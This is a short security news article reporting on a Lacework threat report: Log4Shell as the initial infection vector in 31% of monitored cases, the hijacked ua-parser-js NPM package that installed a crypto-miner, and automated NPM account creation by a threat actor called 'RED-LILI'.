Log4Shell Used in a Third of Malware Infections

Written by

The infamous Log4Shell vulnerability was exploited as an initial infection vector in 31% of cases monitored by Lacework over the past six months.

The software vendor’s latest Lacework Cloud Threat Report highlights the risks present in today’s digital supply chain.

Its findings confirm that the Log4j bug was used extensively by threat actors, as security experts had suspected when it emerged in December last year.

Lacework Labs said that while it initially observed a flood of requests with exploit payloads shortly after the Log4Shell disclosure, these were the result mainly of researchers searching for the vulnerability. However, these were replaced by malign requests over time, as threat actors adopted publicly available proof-of-concept exploits.

“Over time, we watched scanning activity evolve into more frequent attacks, including some that deployed crypto-miners and Distributed Denial of Service (DDoS) bots to affected systems,” it explained.

“In addition to improving their payloads, adversaries continued to adapt their exploitation methods to stay ahead of signature-based detections used by many types of security products.”

Log4j wasn’t the only software dependency being abused in late 2021. Many threat actors used a backdoor in the NPM package ua-parser-js to open Linux systems to receive and run the open-source cryptocurrency miner, XMRig.

The original attacker had managed to compromise the NPM developer’s account to push a malicious update to the package.

In fact, threat actors increasingly favor NPM as a vector for attack. A report from Checkmarx this week claimed that attackers had streamlined the process of creating new NPM accounts from which to distribute supply chain malware.

“The attacker has fully automated the process of NPM account creation and has open dedicated accounts, one per package, making his new malicious packages much harder to spot,” it explained.

“At the time of writing, the threat actor ‘RED-LILI’ is still active at the time of writing and continues to publish malicious packages.”

What’s hot on Infosecurity Magazine?